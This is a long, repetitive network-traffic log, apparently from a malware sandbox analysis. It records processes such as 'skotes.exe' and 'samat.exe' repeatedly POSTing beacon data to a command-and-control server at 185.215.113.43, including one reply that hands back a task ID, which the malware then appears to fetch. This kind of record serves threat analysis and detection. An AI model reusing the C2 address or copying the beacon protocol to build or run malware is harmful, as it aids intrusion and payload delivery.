                                                                                                                                                                                                                                                                                    Date: Thu, 21 Nov 2024 21:18:00 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    98192.168.2.550137185.215.113.43804500C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:18:02.521106005 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                    Host: 185.215.113.43
                                                                                                                                                                                                                                                                                    Content-Length: 4
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                    Data Ascii: st=s
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:18:03.948764086 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                    Date: Thu, 21 Nov 2024 21:18:03 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 1 0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                    99192.168.2.550138185.215.113.4380
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:18:05.582566023 CET310OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                    Host: 185.215.113.43
                                                                                                                                                                                                                                                                                    Content-Length: 156
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39
                                                                                                                                                                                                                                                                                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:18:07.011620998 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                    Date: Thu, 21 Nov 2024 21:18:06 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                    100192.168.2.550139185.215.113.4380
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:18:08.761729956 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                    Host: 185.215.113.43
                                                                                                                                                                                                                                                                                    Content-Length: 4
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                    Data Ascii: st=s
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:18:10.107698917 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                    Date: Thu, 21 Nov 2024 21:18:09 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 1 0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                    101192.168.2.550140185.215.113.4380
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:18:11.735997915 CET310OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                    Host: 185.215.113.43
                                                                                                                                                                                                                                                                                    Content-Length: 156
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39
                                                                                                                                                                                                                                                                                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:18:13.136445999 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                    Date: Thu, 21 Nov 2024 21:18:12 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                    102192.168.2.550141185.215.113.4380
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:18:14.882879019 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                    Host: 185.215.113.43
                                                                                                                                                                                                                                                                                    Content-Length: 4
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                    Data Ascii: st=s
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:18:16.269908905 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                    Date: Thu, 21 Nov 2024 21:18:16 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 1 0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                    103192.168.2.550142185.215.113.4380
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:18:17.895167112 CET310OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                    Host: 185.215.113.43
                                                                                                                                                                                                                                                                                    Content-Length: 156
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39
                                                                                                                                                                                                                                                                                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:18:19.233886957 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                    Date: Thu, 21 Nov 2024 21:18:19 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                    104192.168.2.550143185.215.113.4380
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:18:20.975855112 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                    Host: 185.215.113.43
                                                                                                                                                                                                                                                                                    Content-Length: 4
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                    Data Ascii: st=s
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:18:22.396718025 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                    Date: Thu, 21 Nov 2024 21:18:22 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 1 0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                    105192.168.2.550144185.215.113.4380
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:18:24.023077011 CET310OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                    Host: 185.215.113.43
                                                                                                                                                                                                                                                                                    Content-Length: 156
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39
                                                                                                                                                                                                                                                                                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:18:25.505191088 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                    Date: Thu, 21 Nov 2024 21:18:25 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                    106192.168.2.550145185.215.113.4380
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:18:27.256438017 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                    Host: 185.215.113.43
                                                                                                                                                                                                                                                                                    Content-Length: 4
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                    Data Ascii: st=s
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:18:28.654191017 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                    Date: Thu, 21 Nov 2024 21:18:28 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 1 0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                    107192.168.2.550146185.215.113.4380
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:18:30.288851023 CET310OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                    Host: 185.215.113.43
                                                                                                                                                                                                                                                                                    Content-Length: 156
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39
                                                                                                                                                                                                                                                                                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:18:31.674215078 CET287INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                    Date: Thu, 21 Nov 2024 21:18:31 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Data Raw: 36 31 0d 0a 20 3c 63 3e 31 30 30 38 30 33 30 30 30 31 2b 2b 2b 62 35 39 33 37 63 31 61 39 39 64 35 66 39 64 66 30 62 35 64 61 66 63 38 35 30 36 32 33 38 34 37 36 30 61 63 30 32 62 34 64 65 64 38 61 62 65 65 65 31 66 62 63 66 37 30 39 31 35 34 34 31 62 62 35 64 66 30 30 32 34 31 35 34 35 30 23 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 61 <c>1008030001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbcf70915441bb5df002415450#<d>0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                    108192.168.2.550148185.215.113.4380
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:18:35.867182970 CET184OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                    Host: 185.215.113.43
                                                                                                                                                                                                                                                                                    Content-Length: 31
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    Data Raw: 64 31 3d 31 30 30 38 30 33 30 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                                                                                                                                                    Data Ascii: d1=1008030001&unit=246122658369
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:18:37.261198044 CET193INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                    Date: Thu, 21 Nov 2024 21:18:37 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 4 <c>0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                    109192.168.2.550149185.215.113.4380
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:18:39.007327080 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                    Host: 185.215.113.43
                                                                                                                                                                                                                                                                                    Content-Length: 4
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                    Data Ascii: st=s
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:18:40.385231972 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                    Date: Thu, 21 Nov 2024 21:18:40 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 1 0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                    110192.168.2.550150185.215.113.4380
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:18:42.024131060 CET310OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                    Host: 185.215.113.43
                                                                                                                                                                                                                                                                                    Content-Length: 156
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39
                                                                                                                                                                                                                                                                                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:18:43.361336946 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                    Date: Thu, 21 Nov 2024 21:18:43 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                    111192.168.2.550151185.215.113.4380
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:18:45.116002083 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                    Host: 185.215.113.43
                                                                                                                                                                                                                                                                                    Content-Length: 4
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                    Data Ascii: st=s
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:18:46.556965113 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                    Date: Thu, 21 Nov 2024 21:18:46 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 1 0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    112192.168.2.550154185.215.113.43806120C:\Users\user\AppData\Local\Temp\1008029001\samat.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:18:51.335454941 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                    Host: 185.215.113.43
                                                                                                                                                                                                                                                                                    Content-Length: 4
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                    Data Ascii: st=s
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:18:52.674668074 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                    Date: Thu, 21 Nov 2024 21:18:52 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 1 0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                    113192.168.2.550156185.215.113.4380
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:18:54.305783987 CET310OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                    Host: 185.215.113.43
                                                                                                                                                                                                                                                                                    Content-Length: 156
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39
                                                                                                                                                                                                                                                                                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:18:55.640656948 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                    Date: Thu, 21 Nov 2024 21:18:55 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
